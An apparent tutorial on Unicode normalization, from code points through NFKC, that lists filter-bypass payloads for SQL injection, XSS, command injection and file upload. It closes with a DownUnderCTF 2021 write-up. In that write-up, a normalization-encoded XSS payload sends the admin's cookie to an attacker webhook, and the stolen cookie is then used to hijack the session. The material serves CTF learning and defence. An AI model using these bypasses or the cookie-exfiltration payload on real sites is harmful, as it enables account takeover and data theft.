What is Unicode?
Unicode, formally the Unicode Standard, is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world’s writing systems.
Each character is assigned a code point: for example, “A” is mapped to U+0041, and “a” is mapped to U+0061. Code points range from U+0000 to U+10FFFF, which gives 1,114,112 possible values. Unicode divides this range into 17 “planes”. The best known is the BMP (Basic Multilingual Plane), which goes from U+0000 to U+FFFF; it is plane 0, and the 16 supplementary planes that follow it are informally called “astral planes”.
Characters in the astral planes do not fit in a single 16-bit code unit, so UTF-16 represents them as “surrogate pairs”.
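To make the code point and surrogate pair ideas concrete, here is a small sketch that can be run in Node.js or a browser console. U+1F600 is only an illustrative astral character chosen for this example; any code point above U+FFFF behaves the same way.

```javascript
// Code points for the two examples from the text.
const upperA = "A".codePointAt(0).toString(16).toUpperCase().padStart(4, "0");
const lowerA = "a".codePointAt(0).toString(16).toUpperCase().padStart(4, "0");

// U+1F600 lies outside the BMP, so UTF-16 needs two code units for it.
const astral = String.fromCodePoint(0x1f600);
const high = astral.charCodeAt(0); // high (lead) surrogate
const low = astral.charCodeAt(1); // low (trail) surrogate

console.log(`U+${upperA}`, `U+${lowerA}`); // U+0041 U+0061
console.log(astral.length, high.toString(16), low.toString(16)); // 2 d83d de00
```

JavaScript strings are sequences of UTF-16 code units, which is why `length` reports 2 for a single astral character.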
Unicode equivalence is the specification by the Unicode character encoding standard that some sequences of code points represent essentially the same character; Unicode normalization is the process that applies it. On a more technical level, normalization ensures that two strings that use different binary representations for the same characters have the same binary value after normalization.
Canonical equivalent characters are assumed to have the same appearance and meaning when printed or displayed.
Compatibility equivalence is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently.
There are four normalization forms defined by the Unicode Standard: NFC, NFD, NFKC and NFKD. Each applies canonical and compatibility normalization techniques in a different way. You can read more on the different techniques at unicode.org.
- NFC: Normalization Form Canonical Composition
- NFD: Normalization Form Canonical Decomposition
- NFKC: Normalization Form Compatibility Composition
- NFKD: Normalization Form Compatibility Decomposition
The general idea behind all of these algorithms is to “normalize” some code points to end up having the same character.
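The difference between canonical and compatibility normalization can be seen with the built-in `String.prototype.normalize`. This is a minimal sketch; the sample characters (é and the ﬁ ligature) are illustrative choices, not taken from the original text.

```javascript
const composed = "\u00e9"; // é as a single code point
const decomposed = "e\u0301"; // e followed by a combining acute accent

// Canonically equivalent strings differ in raw form but match after NFC.
const rawEqual = composed === decomposed;
const nfcEqual = composed.normalize("NFC") === decomposed.normalize("NFC");
const nfdLength = composed.normalize("NFD").length;

// The ligature U+FB01 is only compatibility-equivalent to "fi".
const ligature = "\ufb01";
const nfc = ligature.normalize("NFC"); // left unchanged
const nfkc = ligature.normalize("NFKC"); // becomes the two letters "fi"

console.log(rawEqual, nfcEqual, nfdLength); // false true 2
console.log(nfc === ligature, nfkc); // true fi
```

The compatibility forms (NFKC and NFKD) are the ones that matter most for the attacks described here, because they fold visually similar characters into plain ASCII.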
What is the impact?
What can we, as attackers do with Unicode?
SQL Injection - SQLi
| Character | Payload | After normalization |
|---|---|---|
| ＇ (U+FF07) | ＇ or ＇1＇=＇1 | ' or '1'='1 |
| ＂ (U+FF02) | ＂ or ＂1＂=＂1 | " or "1"="1 |
Server-Side Request Forgery - SSRF
Cross Site Scripting - XSS
| Character | Payload | After normalization |
|---|---|---|
| ＜ (U+FF1C) | ＜script src=a／＞ | <script src=a/> |
Template Injection - SSTI and CSTI
OS Command Injection
| Character | Payload | After normalization |
|---|---|---|
| ｜ (U+FF5C) | ｜｜ whoami | \|\| whoami |
Arbitrary file upload
| Characters | Payload | After normalization |
|---|---|---|
| ｐ (U+FF50), ʰ (U+02B0) | shell.ｐʰｐ | shell.php |
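The payloads in the tables above can be checked with a short script. This sketch assumes the target normalizes input with NFKC (or NFKD); the `samples` array is simply the table rows written with escape sequences so the special characters are unambiguous.

```javascript
// [payload as sent, expected result after compatibility normalization]
const samples = [
  ["\uff07 or \uff071\uff07=\uff071", "' or '1'='1"],
  ["\uff02 or \uff021\uff02=\uff021", '" or "1"="1'],
  ["\uff1cscript src=a\uff0f\uff1e", "<script src=a/>"],
  ["\uff5c\uff5c whoami", "|| whoami"],
  ["shell.\uff50\u02b0\uff50", "shell.php"],
];

// Apply NFKC to every payload and compare against the expected ASCII form.
const results = samples.map(([payload]) => payload.normalize("NFKC"));

samples.forEach(([payload, expected], i) => {
  console.log(`${payload} -> ${results[i]} (${results[i] === expected})`);
});
```

None of the payloads contains the ASCII character a naive filter would look for, yet each one turns into the dangerous string once normalized.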
Chain reaction writeup from DownUnderCTF 2021
Upon visiting the main page, we see an option to register or log in:
Register any account and log in:
After logging in, we are presented with the option to visit our profile in the upper right corner of the page:
On our profile page, we can update our username and “About me” text, and report the current page to the admin:
This might be an opportunity to XSS the page, but after inserting <script>alert(1)</script> I get redirected to this page:
At this point, we know that some kind of input sanitization or character blacklisting is being performed. After some trial and error, I decided to try replacing the blacklisted characters with Unicode equivalents taken from a Unicode normalization reference table.
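The challenge's server-side code is not shown in this writeup, so the following is only a hypothetical sketch of the kind of logic that makes this bypass possible: a blacklist check on the raw input, followed by normalization. The `BLACKLIST` contents and the function names are assumptions made for illustration.

```javascript
// Hypothetical blacklist; the real filter used by the challenge is unknown.
const BLACKLIST = ["<", ">", '"', "script"];

function isBlocked(input) {
  const lowered = input.toLowerCase();
  return BLACKLIST.some((token) => lowered.includes(token));
}

// Vulnerable order: validate the raw input first, normalize afterwards.
function vulnerableSanitize(input) {
  if (isBlocked(input)) return null; // rejected
  return input.normalize("NFKC"); // stored or rendered in normalized form
}

const plain = vulnerableSanitize("<script>alert(1)</script>");
const bypass = vulnerableSanitize(
  "\ufe64scri\u1d56t\ufe65alert(1)\ufe64/scri\u1d56t\ufe65"
);

console.log(plain); // null
console.log(bypass); // <script>alert(1)</script>
```

In this sketch the second input passes the check because it contains none of the blacklisted strings, and only becomes a script tag after normalization. Running the check on the normalized string instead would reject both inputs.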
I intercepted the profile update request in Burp Suite and broke out of the surrounding HTML by injecting ""> test encoded with Unicode-equivalent characters. The full payload was:
%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 var i = new Image(); i.src='https://webhook.site/MYID?' %2b btoa(document.cookie) %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5
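After URL decoding and normalization, this translates to:
""><script> var i = new Image(); i.src='https://webhook.site/MYID?' + btoa(document.cookie) </script>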
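The translation can be reproduced by percent-decoding the payload and applying compatibility normalization. This sketch assumes the server uses NFKC or an equivalent form; the variable names are illustrative.

```javascript
// The payload exactly as it was sent in the intercepted request.
const payload =
  "%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 " +
  "var i = new Image(); i.src='https://webhook.site/MYID?' " +
  "%2b btoa(document.cookie) %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5";

// Step 1: URL decoding yields the Unicode look-alike characters.
const decodedPayload = decodeURIComponent(payload);

// Step 2: NFKC folds U+FF02, U+FE64, U+FE65 and U+1D56 into ", <, > and p.
const normalizedPayload = decodedPayload.normalize("NFKC");

console.log(decodedPayload);
console.log(normalizedPayload);
```

The decoded string contains no ASCII quote, angle bracket or the word script, which is why it slips past the filter before normalization turns it into working markup.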
Here I create a new image element and set its src attribute to point to a webhook URL I created, appending the user’s cookie, which is read from document.cookie and encoded to Base64 using btoa(). The script keyword is blacklisted, so I had to replace p with a Unicode equivalent.
After pressing the “Report Error” button on the page, my webhook received a request with the Base64 value appended:
Decoding the Base64 value gives the admin’s cookie.
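The decoding step can be sketched as follows. The cookie string below is a placeholder built from COOKIE_VALUE, not the value actually captured, and the snippet assumes a browser console or Node.js 16+, where `btoa` and `atob` are available as globals.

```javascript
// Placeholder standing in for the admin's real cookie string.
const cookie = "admin-cookie=COOKIE_VALUE";

// What the injected script appends to the webhook URL.
const encoded = btoa(cookie);

// What we recover on our side from the webhook request.
const decoded = atob(encoded);

console.log(encoded);
console.log(decoded);
```

In the real attack only the `atob` call is needed, applied to the query string received by the webhook.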
I applied the cookie to my current session by opening developer tools and executing the following:
document.cookie = "admin-cookie=COOKIE_VALUE"
Now we are able to access the /admin endpoint, which holds the flag: